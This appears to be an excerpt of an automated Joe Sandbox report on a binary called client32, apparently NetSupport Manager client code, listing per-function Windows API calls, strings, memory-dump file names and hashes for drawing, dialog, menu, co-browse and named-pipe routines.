Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
API String ID: 1946598539-1930157642
Opcode ID: 1ea0e76ff816f791314a2c8a492d94fb9bc916f2b51b000fe32d226f0c3b835b
Instruction ID: 389614aaf610e7bfcd0c16fb36dbf4b67e39d021bcafb49a8cfa058e789a035d
Opcode Fuzzy Hash: 1ea0e76ff816f791314a2c8a492d94fb9bc916f2b51b000fe32d226f0c3b835b
Instruction Fuzzy Hash: CFB10578B40316ABE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9408B94

Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D480: __itow.LIBCMT ref: 1105D4A5

GetObjectA.GDI32(?,0000003C,?), ref: 11005435

Part of subcall function 1110C530: _malloc.LIBCMT ref: 1110C539
Part of subcall function 1110C530: _memset.LIBCMT ref: 1110C562

wsprintfA.USER32 ref: 1100548D
DeleteObject.GDI32(?), ref: 110054E2
DeleteObject.GDI32(?), ref: 110054EB
SelectObject.GDI32(?,?), ref: 11005502
DeleteObject.GDI32(?), ref: 11005508
DeleteDC.GDI32(?), ref: 1100550E
SelectObject.GDI32(?,?), ref: 1100551F
DeleteObject.GDI32(?), ref: 11005528
DeleteDC.GDI32(?), ref: 1100552E
DeleteObject.GDI32(?), ref: 1100553F
DeleteObject.GDI32(?), ref: 1100556A
DeleteObject.GDI32(?), ref: 11005588
DeleteObject.GDI32(?), ref: 11005591
ShowWindow.USER32(?,00000009), ref: 110055BF
PostQuitMessage.USER32(00000000), ref: 110055C7

Strings

Font, xrefs: 1100549F
Tool, xrefs: 11005383
PenColour, xrefs: 110053A1
PenWidth, xrefs: 110053DD
FillStyle, xrefs: 11005419
FillColour, xrefs: 110053FB
PenStyle, xrefs: 110053BF
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005487
Annotate, xrefs: 11005388, 110053A6, 110053C4, 110053E2, 11005400, 1100541E, 110054A4

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 5a827f03535f334cf83cafa42c304014905e54e144117175e7cb594d9886b49b
Instruction ID: f1dabe6cf6be8bc1e52f81cc9166d66655addb9bb3b55ca735fbb276793ba485
Opcode Fuzzy Hash: 5a827f03535f334cf83cafa42c304014905e54e144117175e7cb594d9886b49b
Instruction Fuzzy Hash: 4A813975600605AFD764DBA5C890EABF7F9AF8C304F10450DF6AA97281DA70F841CF60

Function 110154A0 Relevance: 43.7, APIs: 29, Instructions: 170COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 110154CF
GetWindowRect.USER32(?,?), ref: 110154E7
_memset.LIBCMT ref: 110154F5
CreateFontIndirectA.GDI32(?), ref: 11015511
SelectObject.GDI32(00000000,00000000), ref: 11015525
SetBkMode.GDI32(00000000,00000001), ref: 11015530
BeginPath.GDI32(00000000), ref: 1101553D
TextOutA.GDI32(00000000,00000000,00000000), ref: 11015560
EndPath.GDI32(00000000), ref: 11015567
PathToRegion.GDI32(00000000), ref: 1101556E
CreateSolidBrush.GDI32(?), ref: 11015580
CreateSolidBrush.GDI32(?), ref: 11015596
CreatePen.GDI32(00000000,00000002,?), ref: 110155B0
SelectObject.GDI32(00000000,00000000), ref: 110155BE
SelectObject.GDI32(00000000,?), ref: 110155CE
GetRgnBox.GDI32(00000000,?), ref: 110155DB
OffsetRgn.GDI32(00000000,?,00000000), ref: 110155FA
FillRgn.GDI32(00000000,00000000,?), ref: 11015609
FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101561C
DeleteObject.GDI32(00000000), ref: 11015629
SelectObject.GDI32(00000000,?), ref: 11015633
SelectObject.GDI32(00000000,?), ref: 1101563D
DeleteObject.GDI32(?), ref: 11015646
DeleteObject.GDI32(?), ref: 1101564F
DeleteObject.GDI32(?), ref: 11015658
SelectObject.GDI32(00000000,?), ref: 11015662
DeleteObject.GDI32(?), ref: 1101566B
SetBkMode.GDI32(00000000,?), ref: 11015675
EndPaint.USER32(?,?), ref: 11015689

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
String ID:
API String ID: 3702029449-0
Opcode ID: dac0c3963ce5ac916e529ee37df48100e2e3e6b52fe436c0214eee6deabadbf4
Instruction ID: 759b3f7a2420f70d437b887ad303519823317909818bfc8f2a5485a229e6afa7
Opcode Fuzzy Hash: dac0c3963ce5ac916e529ee37df48100e2e3e6b52fe436c0214eee6deabadbf4
Instruction Fuzzy Hash: 3351FC75A01229AFDB11DBA4CC88FAEF7B9EF89304F008199F605D7244DB749A44CF62

Function 11045700 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 345timewindowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(00000000,?,00000040), ref: 11045760
GetDlgItem.USER32(00000000,?), ref: 1104579E
SetWindowTextA.USER32(00000000,00000000), ref: 110457F3
SetDlgItemTextA.USER32(00000000,?,?), ref: 11045810
SetDlgItemTextA.USER32(00000000,0000046D,?), ref: 11045825
SetDlgItemTextA.USER32(00000000,0000047B,00000000), ref: 1104584B
GetDlgItem.USER32(00000000,?), ref: 110458D0
GetDlgItem.USER32(00000000,00000001), ref: 1104592D
ShowWindow.USER32(00000000), ref: 11045930
SetWindowPos.USER32(00000000,00000001,-0000000A,-0000000A,00000000,00000000,00000041,00000000), ref: 110459B3
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11045877

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000041), ref: 110459F8
BringWindowToTop.USER32(?), ref: 11045A0C

Part of subcall function 1115B7F0: SetForegroundWindow.USER32(?), ref: 1115B81E

MessageBeep.USER32(000000FF), ref: 11045A1D

Part of subcall function 11141440: GetVersionExA.KERNEL32(111EBE98,76938400), ref: 11141470
Part of subcall function 11141440: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111414AF
Part of subcall function 11141440: _memset.LIBCMT ref: 111414CD
Part of subcall function 11141440: _strncpy.LIBCMT ref: 1114159A

GetSystemMetrics.USER32(0000000C), ref: 11045A81
GetSystemMetrics.USER32(0000000B), ref: 11045A86
LoadImageA.USER32(00000000,00000483,00000001,00000000), ref: 11045A96
DestroyCursor.USER32(00000000), ref: 11045ABD

Strings

Register for log off event, xrefs: 11045A23
m_hWnd, xrefs: 11045749, 110457E1, 1104585D, 11045992, 110459D7
m_idata, xrefs: 110458F4
CLTCONN.CPP, xrefs: 110458EF
Create Message Dialog, xrefs: 11045766
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11045744, 110457DC, 11045858, 1104598D, 110459D2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$Text$MessageMetricsSystem_memsetwsprintf$BeepBringCursorDestroyErrorExitForegroundImageLastLoadOpenProcessShowTimerVersion_malloc_strncpy
String ID: CLTCONN.CPP$Create Message Dialog$Register for log off event$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_idata
API String ID: 1849440925-926533556
Opcode ID: dec4414d7e9a6f66ecf6276e4547ca17b9ac7fddbf0a4bbd13898aebf5bf371c
Instruction ID: 36266c88eb974b4ac87d82b65aa996088063d8eec38b2a8be9aa62edc29bfaa0
Opcode Fuzzy Hash: dec4414d7e9a6f66ecf6276e4547ca17b9ac7fddbf0a4bbd13898aebf5bf371c
Instruction Fuzzy Hash: A1C1D2B5A00716AFE710DBA1CCC1FAAF3E9AF44718F104568F625AB680DB75E841CB51

Function 11049200 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 280COMMON

Download Yara Rule

APIs

Part of subcall function 11141440: GetVersionExA.KERNEL32(111EBE98,76938400), ref: 11141470
Part of subcall function 11141440: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111414AF
Part of subcall function 11141440: _memset.LIBCMT ref: 111414CD
Part of subcall function 11141440: _strncpy.LIBCMT ref: 1114159A

Part of subcall function 11042420: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104248A
Part of subcall function 11042420: GetWindowLongA.USER32(00000000,000000F0), ref: 11042491
Part of subcall function 11042420: IsWindow.USER32(00000000), ref: 1104249E
Part of subcall function 11042420: GetWindowRect.USER32(00000000,11049250), ref: 110424B5

GetCursorPos.USER32(?), ref: 11049264
WindowFromPoint.USER32(?,?,?,00000000,00000000,00000000), ref: 1104928B
GetClassNameA.USER32(00000000,?,00000040), ref: 1104929D
WaitForInputIdle.USER32(00000000,000003E8), ref: 110493B8
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 110493CB
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 110493D4
GetCursorPos.USER32(?), ref: 110493DD
EnumWindows.USER32(11042520,?), ref: 11049434
GetWindowRect.USER32(?,?), ref: 11049450
WindowFromPoint.USER32(?,?,?,?,?,?,00000000,00000000,00000000), ref: 1104946A
GetClassNameA.USER32(00000000,?,00000040), ref: 11049479

Strings

ActivateStui=-1, @%d,%d, actwin=%x [%s], xrefs: 11049497
ActivateStui=%d, @%d,%d, actwin=%x [%s], xrefs: 110492B7
', xrefs: 110494F2
*ExitMetroBreak, xrefs: 110493EE
*ExitMetroCloseDelay, xrefs: 11049549
Client, xrefs: 110493FF, 1104954E
"%sNSClientTB.exe", xrefs: 11049361
NSMCoolbar, xrefs: 110492C4, 110494A4

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
API String ID: 4093120923-2853765610
Opcode ID: 85c2da07eb3f9c32575abc30feab8f22ee9ddf08d3ddce563e04c0ecc42036b4
Instruction ID: 2b6fbc4dcffc7661dd41e5abdcad1b6ce9b686f62cea86de082cae3b3be938a3
Opcode Fuzzy Hash: 85c2da07eb3f9c32575abc30feab8f22ee9ddf08d3ddce563e04c0ecc42036b4
Instruction Fuzzy Hash: AAA18775E01229AFDB11CFA0CCC5FAEB7B9AB49704F1041F9E919A7280EB356944CF61

Function 110B95C0 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A

LoadMenuA.USER32(00000000,000032E2), ref: 110B9710
CreateWindowExA.USER32(00000000,NSMCobrMain,?,04CF0000,80000000,80000000,00000190,000001F4,00000000,00000000,?,00000000), ref: 110B9745
SetWindowPlacement.USER32(?,0000002C,00000000,?,?,00000000), ref: 110B97E9
GetMenu.USER32(?), ref: 110B9833
DeleteMenu.USER32(00000000,00000004,00000400,?,?,00000000), ref: 110B983D
GetWindowPlacement.USER32(?,0000002C,?,?,00000000), ref: 110B987E
GetMenu.USER32(?), ref: 110B98D0
GetMenuItemCount.USER32(00000000), ref: 110B98DA
DeleteMenu.USER32(00000000,-00000001,?,?,00000000), ref: 110B98E3

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

UpdateWindow.USER32(?), ref: 110B9925
BringWindowToTop.USER32(?), ref: 110B992F

Strings

,, xrefs: 110B9850
m_hWnd, xrefs: 110B975C, 110B97D1, 110B9822, 110B9866, 110B98BF, 110B9914
about:blank, xrefs: 110B96E1
IsA(), xrefs: 110B9651, 110B96CB
..\CTL32\NSMCobrowse.cpp, xrefs: 110B9757
NSMCobrMain, xrefs: 110B973F
*WindowPos, xrefs: 110B97A1
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B97CC, 110B981D, 110B9861, 110B98BA, 110B990F
*StartPage, xrefs: 110B9683
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110B964C, 110B96C6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Window$DeleteLibraryLoadPlacement$AddressBringCountCreateDefaultErrorExitFreeItemLangLastMessageProcProcessSystemUpdateVersion_memsetwsprintf
String ID: *StartPage$*WindowPos$,$..\CTL32\NSMCobrowse.cpp$IsA()$NSMCobrMain$about:blank$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2603857032-88213634
Opcode ID: 0cec0d50ebee21ba6a17e7d982a91d7d5b549194dcee0b8230c5511c690d440d
Instruction ID: d20e4aafcd83eebda28ce62d0800f56c8c7637518042882d329fa9d1365a34e1
Opcode Fuzzy Hash: 0cec0d50ebee21ba6a17e7d982a91d7d5b549194dcee0b8230c5511c690d440d
Instruction Fuzzy Hash: DB91B2B8A00716AFD721DF65CC84F9AF3B8AF44308F10899CF65657281EB74B944CB95

Function 110ED200 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 110ED21E
GetStockObject.GDI32(0000000F), ref: 110ED232
GetDC.USER32(00000000), ref: 110ED2AA
SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED2BB
RealizePalette.GDI32(00000000), ref: 110ED2C1
GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED2DC
SelectPalette.GDI32(00000000,?,00000001), ref: 110ED2F0
RealizePalette.GDI32(00000000), ref: 110ED2F3
ReleaseDC.USER32(00000000,00000000), ref: 110ED2FB

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
String ID:
API String ID: 1969595663-0
Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction ID: 1e1ad6333aad332ac4071d0bb29ae1495f88fc82ca458ec388263f5441ffa5cc
Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction Fuzzy Hash: B97182B1D01129AFDB00DFA9CC88BEEB7B9FF88715F14806AFA15E7244D77499008B61

Function 110F35D0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179filesleeppipeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110F3608

Part of subcall function 1110C3D0: SetEvent.KERNEL32(00000000,?,1102C03F), ref: 1110C3F4

wsprintfA.USER32 ref: 110F365A

Part of subcall function 110F1070: LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F107C
Part of subcall function 110F1070: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F10A5
Part of subcall function 110F1070: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F10B2
Part of subcall function 110F1070: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F10E3
Part of subcall function 110F1070: GetLastError.KERNEL32 ref: 110F10F0
Part of subcall function 110F1070: Sleep.KERNEL32(000003E8), ref: 110F110F
Part of subcall function 110F1070: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F112E
Part of subcall function 110F1070: LocalFree.KERNEL32(?), ref: 110F113F

wsprintfA.USER32 ref: 110F369E
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 110F36CA
Sleep.KERNEL32(000003E8), ref: 110F36DC
SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 110F36F9
ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 110F3763
CloseHandle.KERNEL32(00000000), ref: 110F379E
GetLastError.KERNEL32 ref: 110F37AC
InterlockedExchange.KERNEL32(?,00000000), ref: 110F37B8
CloseHandle.KERNEL32(00000000), ref: 110F37C3
SetEvent.KERNEL32(00000258), ref: 110F37DA
InterlockedExchange.KERNEL32(?,00000000), ref: 110F37EC
CloseHandle.KERNEL32(00000000), ref: 110F37F3
InterlockedExchange.KERNEL32(?,00000000), ref: 110F37FF
CloseHandle.KERNEL32(00000000), ref: 110F3809

Strings

\\.\pipe\nsm_vistapipe%d, xrefs: 110F3698
\\.\pipe\nsm_%s, xrefs: 110F3654
VistaUIPipe%d, xrefs: 110F35F6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
